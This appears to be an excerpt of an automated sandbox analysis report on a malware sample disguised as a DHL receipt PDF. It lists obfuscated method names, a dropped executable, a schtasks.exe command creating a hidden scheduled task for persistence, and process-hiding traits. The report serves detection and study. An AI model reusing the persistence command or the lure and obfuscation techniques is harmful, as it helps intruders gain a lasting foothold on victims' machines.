Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, eP3b5PfCxOjv0X2SHk.cs	High entropy of concatenated method names: 'gOAPg0fUmj', 'O55PyU0QEw', 'uwjP0LdmmP', 'etlPsKrInd', 'JYVPQOrEWZ', 'bgsP6iW1Yk', 'U4P8mJk0bAbOYsMHCO', 'sEklayJONDr04sVOf5', 'qMIPPgCn1j', 'U7qPb13pih'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, HcZr0ozmkNIrhaID3l.cs	High entropy of concatenated method names: 'gpXZYNaL0t', 'uO7ZLlBXQh', 'tvDZ7YENU8', 'h83Z8xWZGl', 'O1IZSXwxKZ', 'YQmZpu07Br', 'HZKZGn27NB', 'nmdZaSG14W', 'Nq8ZiYOpVb', 'JYkZBclEq8'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, LQGlTpG2n910MRJaQi.cs	High entropy of concatenated method names: 'bJHMjSTg35', 'H9QMDGkJLS', 'xBUMv0nYUw', 'JAfIi3fF7pfoENglRrZ', 'KsqPxPfK82CXTybORdo', 'JeGXAQfYGRhKvEMu9Ec'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, wQphncPf7DsW6NYrCF4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P0qKXC5Adb', 'EDvKZHApnJ', 'tblKoAH81p', 'WeBKKKlRfB', 'x93Kqg0cGW', 'QhXKTomQk5', 'Hu1Kad2OQF'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, VlhVUbjpgP9lNe5bBN.cs	High entropy of concatenated method names: 'llNgJmWMET', 'F6xgObZfdQ', 'mQlgMYhwcy', 'linMeJ0PyW', 'LlMMzstmGa', 'sIkgV8UCGM', 'tMmgPUc6U6', 'fASgEAc5SN', 'pAGgby2LFB', 'BDRgfE7sDe'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, AXq7KAksaIOtpswRml.cs	High entropy of concatenated method names: 'KVAXQECRUT', 'I86XmuIV8n', 'WlXXXBTKS9', 'OPrXoiH0WC', 'ceAXq3bTyI', 'kvPXaMcIcJ', 'Dispose', 'bPeHJ0V3QB', 'wcZHWxYY0t', 'Cq2HOsWwlX'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, X7ppCrWV5Um29wcmqq.cs	High entropy of concatenated method names: 'Dispose', 'ROtPUpswRm', 'JiFES94yQA', 'JgL139oFYe', 'Hf5PexoKJL', 'EUePzg6tRs', 'ProcessDialogKey', 'RF1EVlNuDJ', 'jgLEPFttP5', 'LJXEEtFKFn'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, P0fUmjLC55U0QEwxD9.cs	High entropy of concatenated method names: 'j8rW45Bq8s', 'sR8WIWIu8A', 'ISYWrOGARn', 'M8XWwvDWpT', 'aLbW99n40S', 'JolW3maSkq', 'xbxWkfSWU7', 'YwYWRoMoMZ', 'RsXWUaIhfq', 'UInWecXUgc'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, mSqAlnyPPcc8wFepWt.cs	High entropy of concatenated method names: 'f8ibxymN34', 'l6YbJsHkLg', 'CvdbW04xQ6', 'RFXbOCNvCm', 'gGabcu2KKJ', 'cNXbMUflPA', 'HTgbgl6xXO', 'quMbyd4p91', 'NL1b2I7QN9', 'Hecb0vpDfX'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, DlkQ6xteDbFY44QGQo.cs	High entropy of concatenated method names: 'q0SuL7qDhc', 'Ojmu7jH9VI', 'Q26u8Zn6Me', 'CHTuSIQttK', 'Apyupd99mw', 'LsfuGwHRm4', 'AudujV0S9Q', 'il5udOMA1N', 'QqauCTUsrq', 'ywruhtxf3c'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, HKB7IC4U7GJ5mMDJ4y.cs	High entropy of concatenated method names: 'ahAQCqRJi5', 'rWgQAXbxZN', 'KnGQ4I5y4H', 'MEEQIhLihi', 'mEHQSvTYjj', 'T6oQlK3mpy', 'jU0QpA99Oq', 'LQmQGCWUhj', 'v2HQvFbPCj', 'K81QjdXTdD'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, EBWhskrvCEPtVPOATn.cs	High entropy of concatenated method names: 'ToString', 'HLF6hH0x8r', 'C3M6SrN7Ko', 'Gsd6leKJRY', 'sFR6pLd1wP', 'QDU6Ge6EAJ', 'ivZ6vRq0Co', 'SHk6jDR8ta', 'joD6dhHEx1', 'e8w6DxRhLn'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, QFKFn7eitGer1JBE8h.cs	High entropy of concatenated method names: 'nTLZO52MEi', 'iITZcgVQki', 'uWDZME3rgy', 'yB5ZgP0pVF', 'gt9ZXUGE02', 'swkZygQtMx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, UCiA7K7wjLdmmPftlK.cs	High entropy of concatenated method names: 'i29OnZq3mV', 'hGKOYe7V0K', 'uR5OL9Uq1H', 'kFUO79SoHQ', 'jfCOQ0saq2', 'tSHO6kpLDT', 'rXDOmjHI6x', 'UFjOHqyKmT', 'f5yOXw3nwL', 'SLYOZUC4oS'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, R1ODytOFedK3v5IOZD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uA5EU5mDSV', 'BUTEewI6KQ', 'b5jEzVCIfF', 'WKSbVGKILa', 'cDNbPkRVQk', 'MuCbEne7xo', 'hMobbiZgi3', 'uCBcGVqVTJZ3eyXPBEl'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, AlNuDJUggLFttP5jJX.cs	High entropy of concatenated method names: 'MS8X8X8nNM', 'JqjXSX2xyh', 'RZgXlk0q4u', 'EAcXpb9ySg', 'GUVXGUmLW9', 'pigXvwuJGn', 'NXWXjt4VKZ', 'SkFXdqUsG2', 'DmOXDvyaWK', 'OMEXC0VbqB'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, QnbCPmPPUiXqsWLcObU.cs	High entropy of concatenated method names: 'TwFZe40MiF', 'h0MZzeaFBy', 'eNkoVk2wfR', 'JCyoPqXoJZ', 'OYMoE746UR', 'Yb6obSjNMI', 'mvNofgrCba', 'TwCoxEQ7iy', 'v4JoJpRveV', 'srroWVkoWa'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, fgoSAhDZVN9m6fDqCl.cs	High entropy of concatenated method names: 'RNRgiHqjpK', 'vMjgBtIUPK', 'YKygNDJHcu', 'gUIgnD155x', 'En3g16AIoM', 'NrBgYj4yNX', 'gJug5U5sjD', 'rn4gLDKctV', 'A03g7nWFFD', 'CCngFuxdH5'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, vosZgN3LNmAqOa1Srk.cs	High entropy of concatenated method names: 'xyEmRvJWYp', 's9gmeAmdyn', 'PAhHVqiMin', 'DURHPUDT8A', 'vO1mhqV713', 'gT9mArKf3t', 'TpgmtMoB12', 'hwlm44j0EC', 'Ta3mI2P0Rv', 'QR5mrwW5T8'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, SIcdTrEchw0TPlw55H.cs	High entropy of concatenated method names: 'exvNR6dxn', 'RWlnZr14p', 'iNyYTDM4n', 'Y2B5ggXd8', 'Wc476HIK3', 'r1qFPDeAY', 'hnRCEhCrFGTrfcuPE5', 'WLSFYXhGwPs2Nv9xO9', 'hVEHTpcWB', 'pbiZiD3IB'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, cWZPgs8iW1YkkOKDqB.cs	High entropy of concatenated method names: 'N0GMxpgCDs', 'ANaMW9lRxR', 'Aa5McOHkbb', 'UUwMgtJPNg', 'R5KMyfUJGu', 'IXLc9SuuDM', 'Kxvc3vWlLm', 'mrDckmB67T', 'rrJcRHBPBm', 'vrVcUKMsNo'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, qVLyLfwEXMqNe86Mc5.cs	High entropy of concatenated method names: 'HwHm0kebyC', 'uCkmslwJsu', 'ToString', 'pNNmJ5EWPq', 'phkmWmRkq9', 'YnJmOUyjdt', 'BgLmcQIVDG', 'W0imMIUlCO', 'heCmgJ6IhC', 'AIxmyG4axO'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, SIndSeFc5hAYIpYVOr.cs	High entropy of concatenated method names: 'whBc10jvgN', 'neNc5GDqck', 'N3nOl3pJy3', 'pyQOpnhiQU', 'GZUOGF0Spy', 'Uh3Ovt9GoF', 'z0VOjy4XWX', 'erYOdwtoIu', 'MSKODa47FX', 'fwjOCJQvXF'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, eP3b5PfCxOjv0X2SHk.cs	High entropy of concatenated method names: 'gOAPg0fUmj', 'O55PyU0QEw', 'uwjP0LdmmP', 'etlPsKrInd', 'JYVPQOrEWZ', 'bgsP6iW1Yk', 'U4P8mJk0bAbOYsMHCO', 'sEklayJONDr04sVOf5', 'qMIPPgCn1j', 'U7qPb13pih'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, HcZr0ozmkNIrhaID3l.cs	High entropy of concatenated method names: 'gpXZYNaL0t', 'uO7ZLlBXQh', 'tvDZ7YENU8', 'h83Z8xWZGl', 'O1IZSXwxKZ', 'YQmZpu07Br', 'HZKZGn27NB', 'nmdZaSG14W', 'Nq8ZiYOpVb', 'JYkZBclEq8'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, LQGlTpG2n910MRJaQi.cs	High entropy of concatenated method names: 'bJHMjSTg35', 'H9QMDGkJLS', 'xBUMv0nYUw', 'JAfIi3fF7pfoENglRrZ', 'KsqPxPfK82CXTybORdo', 'JeGXAQfYGRhKvEMu9Ec'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, wQphncPf7DsW6NYrCF4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P0qKXC5Adb', 'EDvKZHApnJ', 'tblKoAH81p', 'WeBKKKlRfB', 'x93Kqg0cGW', 'QhXKTomQk5', 'Hu1Kad2OQF'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, VlhVUbjpgP9lNe5bBN.cs	High entropy of concatenated method names: 'llNgJmWMET', 'F6xgObZfdQ', 'mQlgMYhwcy', 'linMeJ0PyW', 'LlMMzstmGa', 'sIkgV8UCGM', 'tMmgPUc6U6', 'fASgEAc5SN', 'pAGgby2LFB', 'BDRgfE7sDe'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, AXq7KAksaIOtpswRml.cs	High entropy of concatenated method names: 'KVAXQECRUT', 'I86XmuIV8n', 'WlXXXBTKS9', 'OPrXoiH0WC', 'ceAXq3bTyI', 'kvPXaMcIcJ', 'Dispose', 'bPeHJ0V3QB', 'wcZHWxYY0t', 'Cq2HOsWwlX'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, X7ppCrWV5Um29wcmqq.cs	High entropy of concatenated method names: 'Dispose', 'ROtPUpswRm', 'JiFES94yQA', 'JgL139oFYe', 'Hf5PexoKJL', 'EUePzg6tRs', 'ProcessDialogKey', 'RF1EVlNuDJ', 'jgLEPFttP5', 'LJXEEtFKFn'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, P0fUmjLC55U0QEwxD9.cs	High entropy of concatenated method names: 'j8rW45Bq8s', 'sR8WIWIu8A', 'ISYWrOGARn', 'M8XWwvDWpT', 'aLbW99n40S', 'JolW3maSkq', 'xbxWkfSWU7', 'YwYWRoMoMZ', 'RsXWUaIhfq', 'UInWecXUgc'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, mSqAlnyPPcc8wFepWt.cs	High entropy of concatenated method names: 'f8ibxymN34', 'l6YbJsHkLg', 'CvdbW04xQ6', 'RFXbOCNvCm', 'gGabcu2KKJ', 'cNXbMUflPA', 'HTgbgl6xXO', 'quMbyd4p91', 'NL1b2I7QN9', 'Hecb0vpDfX'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, DlkQ6xteDbFY44QGQo.cs	High entropy of concatenated method names: 'q0SuL7qDhc', 'Ojmu7jH9VI', 'Q26u8Zn6Me', 'CHTuSIQttK', 'Apyupd99mw', 'LsfuGwHRm4', 'AudujV0S9Q', 'il5udOMA1N', 'QqauCTUsrq', 'ywruhtxf3c'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, HKB7IC4U7GJ5mMDJ4y.cs	High entropy of concatenated method names: 'ahAQCqRJi5', 'rWgQAXbxZN', 'KnGQ4I5y4H', 'MEEQIhLihi', 'mEHQSvTYjj', 'T6oQlK3mpy', 'jU0QpA99Oq', 'LQmQGCWUhj', 'v2HQvFbPCj', 'K81QjdXTdD'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, EBWhskrvCEPtVPOATn.cs	High entropy of concatenated method names: 'ToString', 'HLF6hH0x8r', 'C3M6SrN7Ko', 'Gsd6leKJRY', 'sFR6pLd1wP', 'QDU6Ge6EAJ', 'ivZ6vRq0Co', 'SHk6jDR8ta', 'joD6dhHEx1', 'e8w6DxRhLn'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, QFKFn7eitGer1JBE8h.cs	High entropy of concatenated method names: 'nTLZO52MEi', 'iITZcgVQki', 'uWDZME3rgy', 'yB5ZgP0pVF', 'gt9ZXUGE02', 'swkZygQtMx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, UCiA7K7wjLdmmPftlK.cs	High entropy of concatenated method names: 'i29OnZq3mV', 'hGKOYe7V0K', 'uR5OL9Uq1H', 'kFUO79SoHQ', 'jfCOQ0saq2', 'tSHO6kpLDT', 'rXDOmjHI6x', 'UFjOHqyKmT', 'f5yOXw3nwL', 'SLYOZUC4oS'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, R1ODytOFedK3v5IOZD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uA5EU5mDSV', 'BUTEewI6KQ', 'b5jEzVCIfF', 'WKSbVGKILa', 'cDNbPkRVQk', 'MuCbEne7xo', 'hMobbiZgi3', 'uCBcGVqVTJZ3eyXPBEl'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, AlNuDJUggLFttP5jJX.cs	High entropy of concatenated method names: 'MS8X8X8nNM', 'JqjXSX2xyh', 'RZgXlk0q4u', 'EAcXpb9ySg', 'GUVXGUmLW9', 'pigXvwuJGn', 'NXWXjt4VKZ', 'SkFXdqUsG2', 'DmOXDvyaWK', 'OMEXC0VbqB'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, QnbCPmPPUiXqsWLcObU.cs	High entropy of concatenated method names: 'TwFZe40MiF', 'h0MZzeaFBy', 'eNkoVk2wfR', 'JCyoPqXoJZ', 'OYMoE746UR', 'Yb6obSjNMI', 'mvNofgrCba', 'TwCoxEQ7iy', 'v4JoJpRveV', 'srroWVkoWa'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, fgoSAhDZVN9m6fDqCl.cs	High entropy of concatenated method names: 'RNRgiHqjpK', 'vMjgBtIUPK', 'YKygNDJHcu', 'gUIgnD155x', 'En3g16AIoM', 'NrBgYj4yNX', 'gJug5U5sjD', 'rn4gLDKctV', 'A03g7nWFFD', 'CCngFuxdH5'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, vosZgN3LNmAqOa1Srk.cs	High entropy of concatenated method names: 'xyEmRvJWYp', 's9gmeAmdyn', 'PAhHVqiMin', 'DURHPUDT8A', 'vO1mhqV713', 'gT9mArKf3t', 'TpgmtMoB12', 'hwlm44j0EC', 'Ta3mI2P0Rv', 'QR5mrwW5T8'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, SIcdTrEchw0TPlw55H.cs	High entropy of concatenated method names: 'exvNR6dxn', 'RWlnZr14p', 'iNyYTDM4n', 'Y2B5ggXd8', 'Wc476HIK3', 'r1qFPDeAY', 'hnRCEhCrFGTrfcuPE5', 'WLSFYXhGwPs2Nv9xO9', 'hVEHTpcWB', 'pbiZiD3IB'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, cWZPgs8iW1YkkOKDqB.cs	High entropy of concatenated method names: 'N0GMxpgCDs', 'ANaMW9lRxR', 'Aa5McOHkbb', 'UUwMgtJPNg', 'R5KMyfUJGu', 'IXLc9SuuDM', 'Kxvc3vWlLm', 'mrDckmB67T', 'rrJcRHBPBm', 'vrVcUKMsNo'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, qVLyLfwEXMqNe86Mc5.cs	High entropy of concatenated method names: 'HwHm0kebyC', 'uCkmslwJsu', 'ToString', 'pNNmJ5EWPq', 'phkmWmRkq9', 'YnJmOUyjdt', 'BgLmcQIVDG', 'W0imMIUlCO', 'heCmgJ6IhC', 'AIxmyG4axO'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, SIndSeFc5hAYIpYVOr.cs	High entropy of concatenated method names: 'whBc10jvgN', 'neNc5GDqck', 'N3nOl3pJy3', 'pyQOpnhiQU', 'GZUOGF0Spy', 'Uh3Ovt9GoF', 'z0VOjy4XWX', 'erYOdwtoIu', 'MSKODa47FX', 'fwjOCJQvXF'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, eP3b5PfCxOjv0X2SHk.cs	High entropy of concatenated method names: 'gOAPg0fUmj', 'O55PyU0QEw', 'uwjP0LdmmP', 'etlPsKrInd', 'JYVPQOrEWZ', 'bgsP6iW1Yk', 'U4P8mJk0bAbOYsMHCO', 'sEklayJONDr04sVOf5', 'qMIPPgCn1j', 'U7qPb13pih'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, HcZr0ozmkNIrhaID3l.cs	High entropy of concatenated method names: 'gpXZYNaL0t', 'uO7ZLlBXQh', 'tvDZ7YENU8', 'h83Z8xWZGl', 'O1IZSXwxKZ', 'YQmZpu07Br', 'HZKZGn27NB', 'nmdZaSG14W', 'Nq8ZiYOpVb', 'JYkZBclEq8'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, LQGlTpG2n910MRJaQi.cs	High entropy of concatenated method names: 'bJHMjSTg35', 'H9QMDGkJLS', 'xBUMv0nYUw', 'JAfIi3fF7pfoENglRrZ', 'KsqPxPfK82CXTybORdo', 'JeGXAQfYGRhKvEMu9Ec'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, wQphncPf7DsW6NYrCF4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P0qKXC5Adb', 'EDvKZHApnJ', 'tblKoAH81p', 'WeBKKKlRfB', 'x93Kqg0cGW', 'QhXKTomQk5', 'Hu1Kad2OQF'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, VlhVUbjpgP9lNe5bBN.cs	High entropy of concatenated method names: 'llNgJmWMET', 'F6xgObZfdQ', 'mQlgMYhwcy', 'linMeJ0PyW', 'LlMMzstmGa', 'sIkgV8UCGM', 'tMmgPUc6U6', 'fASgEAc5SN', 'pAGgby2LFB', 'BDRgfE7sDe'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, AXq7KAksaIOtpswRml.cs	High entropy of concatenated method names: 'KVAXQECRUT', 'I86XmuIV8n', 'WlXXXBTKS9', 'OPrXoiH0WC', 'ceAXq3bTyI', 'kvPXaMcIcJ', 'Dispose', 'bPeHJ0V3QB', 'wcZHWxYY0t', 'Cq2HOsWwlX'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, X7ppCrWV5Um29wcmqq.cs	High entropy of concatenated method names: 'Dispose', 'ROtPUpswRm', 'JiFES94yQA', 'JgL139oFYe', 'Hf5PexoKJL', 'EUePzg6tRs', 'ProcessDialogKey', 'RF1EVlNuDJ', 'jgLEPFttP5', 'LJXEEtFKFn'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, P0fUmjLC55U0QEwxD9.cs	High entropy of concatenated method names: 'j8rW45Bq8s', 'sR8WIWIu8A', 'ISYWrOGARn', 'M8XWwvDWpT', 'aLbW99n40S', 'JolW3maSkq', 'xbxWkfSWU7', 'YwYWRoMoMZ', 'RsXWUaIhfq', 'UInWecXUgc'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, mSqAlnyPPcc8wFepWt.cs	High entropy of concatenated method names: 'f8ibxymN34', 'l6YbJsHkLg', 'CvdbW04xQ6', 'RFXbOCNvCm', 'gGabcu2KKJ', 'cNXbMUflPA', 'HTgbgl6xXO', 'quMbyd4p91', 'NL1b2I7QN9', 'Hecb0vpDfX'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, DlkQ6xteDbFY44QGQo.cs	High entropy of concatenated method names: 'q0SuL7qDhc', 'Ojmu7jH9VI', 'Q26u8Zn6Me', 'CHTuSIQttK', 'Apyupd99mw', 'LsfuGwHRm4', 'AudujV0S9Q', 'il5udOMA1N', 'QqauCTUsrq', 'ywruhtxf3c'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, HKB7IC4U7GJ5mMDJ4y.cs	High entropy of concatenated method names: 'ahAQCqRJi5', 'rWgQAXbxZN', 'KnGQ4I5y4H', 'MEEQIhLihi', 'mEHQSvTYjj', 'T6oQlK3mpy', 'jU0QpA99Oq', 'LQmQGCWUhj', 'v2HQvFbPCj', 'K81QjdXTdD'

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File created: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nlvpnyUnaRqfA" /XML "C:\Users\user\AppData\Local\Temp\tmp44DF.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
